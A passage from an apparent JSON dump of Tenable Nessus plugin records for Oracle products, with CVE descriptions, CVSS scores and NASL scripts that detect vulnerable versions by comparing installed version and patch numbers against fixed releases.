Center\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\napp_name = 'Oracle Enterprise Manager Ops Center';\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nversion_full = install['Full Patch Version'];\npath = install['path'];\npatch_version = install['Patch Version'];\n\n\npatchid = NULL;\nfix = NULL;\n\nif (version_full =~ \"^12\\.3\\.3\\.\")\n{\n patchid = '29623885';\n fix = '1819';\n} \n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (ver_compare(ver:patch_version, fix:fix, strict:FALSE) != -1)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version_full, path);\n\nreport = \n '\\n Path : ' + path + \n '\\n Version : ' + version + \n '\\n Ops Agent Version : ' + version_full + \n '\\n Current Patch : ' + patch_version + \n '\\n Fixed Patch Version : ' + fix +\n '\\n Fix : ' + patchid;\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-02T14:56:35", "description": "The remote host is missing the April 2020 Critical Patch Update for Oracle Identity Manager Connector. It is, therefore, affected by multiple vulnerabilities:\n\n - Vulnerability in the Identity Manager Connector product of Oracle Fusion Middleware (component: General (Apache ActiveMQ)). The supported version that is affected is 9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager Connector. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Identity Manager Connector. (CVE-2019-0222)\n\n - Vulnerability in the Identity Manager Connector product of Oracle Fusion Middleware (component: LDAP Gateway (Spring Framework)). The supported version that is affected is 9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager Connector. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Identity Manager Connector. (CVE-2018-15756)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-01T00:00:00", "type": "nessus", "title": "Oracle Identity Manager Connector Multiple Vulnerabilities (April 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756", "CVE-2019-0222"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:identity_manager"], "id": "ORACLE_IDENTITY_MANAGEMENT_CPU_APR_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/136284", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136284);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2018-15756\", \"CVE-2019-0222\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Identity Manager Connector Multiple Vulnerabilities (April 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by a remote\nsecurity vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the April 2020 Critical Patch Update for\nOracle Identity Manager Connector. It is, therefore, affected by multiple vulnerabilities:\n\n - Vulnerability in the Identity Manager Connector product of Oracle Fusion Middleware \n (component: General (Apache ActiveMQ)). The supported version that is affected is 9.0. Easily exploitable \n vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager Connector. \n Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable \n crash (complete DOS) of Identity Manager Connector. (CVE-2019-0222)\n\n - Vulnerability in the Identity Manager Connector product of Oracle Fusion Middleware (component: LDAP Gateway \n (Spring Framework)). The supported version that is affected is 9.0. Easily exploitable vulnerability allows \n unauthenticated attacker with network access via HTTP to compromise Identity Manager Connector. Successful attacks of \n this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of\n Identity Manager Connector. (CVE-2018-15756)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2020 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0222\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:identity_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_identity_management_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Identity Manager\");\n\n exit(0);\n}\ninclude('vcf.inc');\n\nappname = 'Oracle Identity Manager';\n\napp_info = vcf::get_app_info(app:appname);\n \nconstraints = [\n {'min_version': '9.0', 'fixed_version': '9.1'}\n];\nvcf::check_version_and_report(app_info: app_info, constraints: constraints, severity: SECURITY_WARNING);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-02T15:35:06", "description": "According to its self-reported version number, the Oracle Primavera P6 Enterprise Project Portfolio Management (EPPM) installation running on the remote web server is 8.4 prior to 8.4.15.7, 15.x prior to 15.2.18.2, 16.x prior to 16.2.16.1, 17.x prior to 17.12.9.0, or 18.x prior to 18.8.2.1. It is, therefore, affected by multiple vulnerabilities. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-10-18T00:00:00", "type": "nessus", "title": "Oracle Primavera P6 Enterprise Project Portfolio Management (EPPM) Multiple Vulnerabilities (October 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039", "CVE-2018-3241", "CVE-2018-3281"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management"], "id": "ORACLE_PRIMAVERA_P6_EPPM_CPU_OCT_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/118202", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118202);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-3241\", \"CVE-2018-3281\", \"CVE-2018-11039\");\n script_bugtraq_id(105621);\n\n script_name(english:\"Oracle Primavera P6 Enterprise Project Portfolio Management (EPPM) Multiple Vulnerabilities (October 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Oracle Primavera\nP6 Enterprise Project Portfolio Management (EPPM) installation running\non the remote web server is 8.4 prior to 8.4.15.7, 15.x prior to\n15.2.18.2, 16.x prior to 16.2.16.1, 17.x prior to 17.12.9.0, or 18.x\nprior to 18.8.2.1. It is, therefore, affected by multiple\nvulnerabilities. \n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixPVA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d864b63\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle Primavera P6 Enterprise Project Portfolio Management\n(EPPM) version 8.4.15.7 / 15.2.18.2 / 16.2.16.1 / 17.12.9.0 / 18.8.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-3241\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_primavera_p6_eppm.nbin\");\n script_require_keys(\"installed_sw/Oracle Primavera P6 Enterprise Project Portfolio Management (EPPM)\", \"www/weblogic\");\n script_require_ports(\"Services/www\", 8004);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nget_install_count(app_name:\"Oracle Primavera P6 Enterprise Project Portfolio Management (EPPM)\", exit_if_zero:TRUE);\n\nport = get_http_port(default:8004);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\napp_info = vcf::get_app_info(app:\"Oracle Primavera P6 Enterprise Project Portfolio Management (EPPM)\", port:port);\n\nconstraints = [\n { \"min_version\" : \"8.4.0.0\", \"fixed_version\" : \"8.4.15.7\" },\n { \"min_version\" : \"15.0.0.0\", \"fixed_version\" : \"15.2.18.2\" },\n { \"min_version\" : \"16.0.0.0\", \"fixed_version\" : \"16.2.16.1\" },\n { \"min_version\" : \"17.0.0.0\", \"fixed_version\" : \"17.12.9.0\" },\n { \"min_version\" : \"18.0.0.0\", \"fixed_version\" : \"18.8.2.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-01-11T15:20:12", "description": "According to its self-reported version number, the Oracle Primavera Gateway installation running on the remote web server is 15.x prior to 15.2.16, 16.x prior to 16.2.9, 17.x prior to 17.12.4, or 18.x prior to 18.8.6. It is, therefore, affected by multiple vulnerabilities:\n\n - An unspecified vulnerability in the Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch allows an a malicious user to add a range header with a high number of ranges, or with wide ranges that overlap, or both, to cause a denial of service. (CVE-2018-15756)\n\n - FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization. (CVE-2018-19360)\n\n - FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the openjpa class from polymorphic deserialization. (CVE-2018-19361)\n\n - FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the jboss-common-core class from polymorphic deserialization. (CVE-2018-19362)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-19T00:00:00", "type": "nessus", "title": "Oracle Primavera Gateway Multiple Vulnerabilities (Jul 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:oracle:primavera_gateway"], "id": "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/126828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126828);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\n \"CVE-2018-15756\",\n \"CVE-2018-19360\",\n \"CVE-2018-19361\",\n \"CVE-2018-19362\"\n );\n script_bugtraq_id(105703, 107985);\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Primavera Gateway Multiple Vulnerabilities (Jul 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Oracle Primavera\nGateway installation running on the remote web server is 15.x prior to \n15.2.16, 16.x prior to 16.2.9, 17.x prior to 17.12.4, or 18.x prior to\n18.8.6. It is, therefore, affected by multiple vulnerabilities:\n\n - An unspecified vulnerability in the Spring Framework,\n version 5.1, versions 5.0.x prior to 5.0.10, versions\n 4.3.x prior to 4.3.20, and older unsupported versions\n on the 4.2.x branch allows an a malicious user to add\n a range header with a high number of ranges, or with\n wide ranges that overlap, or both, to cause a denial\n of service. (CVE-2018-15756)\n\n - FasterXML jackson-databind 2.x before 2.9.8 might allow\n attackers to have unspecified impact by leveraging\n failure to block the axis2-transport-jms class from\n polymorphic deserialization. (CVE-2018-19360)\n\n - FasterXML jackson-databind 2.x before 2.9.8 might allow\n attackers to have unspecified impact by leveraging\n failure to block the openjpa class from polymorphic\n deserialization. (CVE-2018-19361)\n\n - FasterXML jackson-databind 2.x before 2.9.8 might allow\n attackers to have unspecified impact by leveraging\n failure to block the jboss-common-core class from\n polymorphic deserialization. (CVE-2018-19362)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html#AppendixPVA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25a1b782\");\n # https://support.oracle.com/rs?type=doc&id=2555549.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5f18b61\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle Primavera Gateway version 15.2.16 / 16.2.9 / 17.12.4\n/ 18.8.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-19362\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:primavera_gateway\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_primavera_gateway.nbin\");\n script_require_keys(\"installed_sw/Oracle Primavera Gateway\");\n script_require_ports(\"Services/www\", 8006);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nget_install_count(app_name:'Oracle Primavera Gateway', exit_if_zero:TRUE);\n\nport = get_http_port(default:8006);\n\napp_info = vcf::get_app_info(app:'Oracle Primavera Gateway', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '15.0.0', 'fixed_version' : '15.2.16' },\n { 'min_version' : '16.0.0', 'fixed_version' : '16.2.9' },\n { 'min_version' : '17.0.0', 'fixed_version' : '17.12.4' },\n { 'min_version' : '18.0.0', 'fixed_version' : '18.8.6' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE); \n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-08T14:42:37", "description": "Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities :\n\n - A deserialization vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI (Apache Groovy)) due to a lack of isolation of object deserialization code. An unauthenticated, remote attacker can exploit this, via HTTP, to execute arbitrary code on the target host.\n (CVE-2016-6814)\n\n - A remote code execution vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI (Apache Commons FileUpload)) due to an unspecified reason. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n (CVE-2016-1000031)\n\n - A denial of service (DoS) vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Apache Batik)) due to an issue with deserialization. An unauthenticated, remote attacker can exploit this issue, via HTTP, to cause the application to stop functioning properly. (CVE-2018-8013)\n\n - A denial of service (DoS) vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI (Spring Framework)) due to an issue handling range requests with a high number of ranges, wide ranges that overlap, or both. An unauthenticated, remote attacker can exploit this issue, via HTTP, to cause the application to stop responding. (CVE-2018-15765)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-29T00:00:00", "type": "nessus", "title": "Oracle WebCenter Sites Multiple Vulnerabilities (July 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031", "CVE-2016-6814", "CVE-2018-15756", "CVE-2018-15765", "CVE-2018-8013"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_SITES_JUL_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/136091", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136091);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2016-6814\",\n \"CVE-2016-1000031\",\n \"CVE-2018-8013\",\n \"CVE-2018-15756\"\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0256-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle WebCenter Sites Multiple Vulnerabilities (July 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple security vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities :\n\n - A deserialization vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion Middleware\n (subcomponent: Advanced UI (Apache Groovy)) due to a lack of isolation of object deserialization code. An\n unauthenticated, remote attacker can exploit this, via HTTP, to execute arbitrary code on the target host.\n (CVE-2016-6814)\n\n - A remote code execution vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion\n Middleware (subcomponent: Advanced UI (Apache Commons FileUpload)) due to an unspecified reason. An\n unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands.\n (CVE-2016-1000031)\n\n - A denial of service (DoS) vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion\n Middleware (subcomponent: Third Party Tools (Apache Batik)) due to an issue with deserialization. An\n unauthenticated, remote attacker can exploit this issue, via HTTP, to cause the application to stop\n functioning properly. (CVE-2018-8013)\n\n - A denial of service (DoS) vulnerability exists in the Oracle WebCenter Sites component of Oracle Fusion\n Middleware (subcomponent: Advanced UI (Spring Framework)) due to an issue handling range requests with\n a high number of ranges, wide ranges that overlap, or both. An unauthenticated, remote attacker can\n exploit this issue, via HTTP, to cause the application to stop responding. (CVE-2018-15765)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2019 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_webcenter_sites_installed.nbin\");\n script_require_keys(\"SMB/WebCenter_Sites/Installed\");\n\n exit(0);\n}\n\nget_kb_item_or_exit('SMB/WebCenter_Sites/Installed');\n\nport = get_kb_item('SMB/transport');\nif (isnull(port))\n port = 445;\n\nversions = get_kb_list('SMB/WebCenter_Sites/*/Version');\nif (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');\n\nreport = '';\n\n# vulnerable versions: \n# - 12.2.1.3.0 - Revision 185862, Patch 29957990\n# Note that the revision does not match up with the version suffix shown in the readme\n\nforeach key (keys(versions))\n{\n fix = '';\n\n version = versions[key];\n revision = get_kb_item(key - '/Version' + '/Revision');\n path = get_kb_item(key - '/Version' + '/Path');\n\n if (isnull(version) || isnull(revision)) continue;\n\n # Patch 29957990 - 12.2.1.3.0 < Revision 185862\n if (version =~ \"^12\\.2\\.1\\.3\\.0$\" && revision < 185862)\n {\n fix = '\\n Fixed revision : 185862' +\n '\\n Required patch : 29957990';\n }\n\n if (fix != '')\n {\n if (!isnull(path)) report += '\\n Path : ' + path;\n report += '\\n Version : ' + version +\n '\\n Revision : ' + revision +\n fix + '\\n';\n }\n}\n\nif (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Oracle WebCenter Sites\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:20:32", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities:\n\n - An unspecified vulnerability allows a remote unauthenticated attacker with network access to compromise and takeover the StorageTek Tape Analytics SW Tool. (CVE-2019-2725) (CVE-2019-2729)\n\n - An unspecified vulnerability allows a remote unauthenticated attacker with network access to compromise and takeover the Tape Virtual Storage Manager GUI. (CVE-2019-2725)\n\n - An unspecified vulnerability in the WLS Core Component allows an authenticated low privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized update, insert or delete access to Oracle WebLogic Server accessible data. (CVE-2019-2824) (CVE-2019-2827)\n\n - An unspecified vulnerability in the jQuery Component allows an authenticated low privileged attacker with network access via HTTP to compromise Oracle WebLogic Server, resulting in unauthorized update, insert or delete access to Oracle WebLogic Server accessible data. Successful attacks require human interaction from actions from another Weblogic user.\n (CVE-2016-71030)\n\n - An unspecified vulnerability in the Application Container - JavaEE Component of Oracle WebLogic Server allows an unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. A successful attack of this vulnerability could result in takeover of Oracle WebLogic Server. (CVE-2019-2856) \n - An unspecified vulnerability in the Sample apps (Spring Framework) Component of Oracle WebLogic Server allows an unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. A successful attack of this vulnerability could result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server. 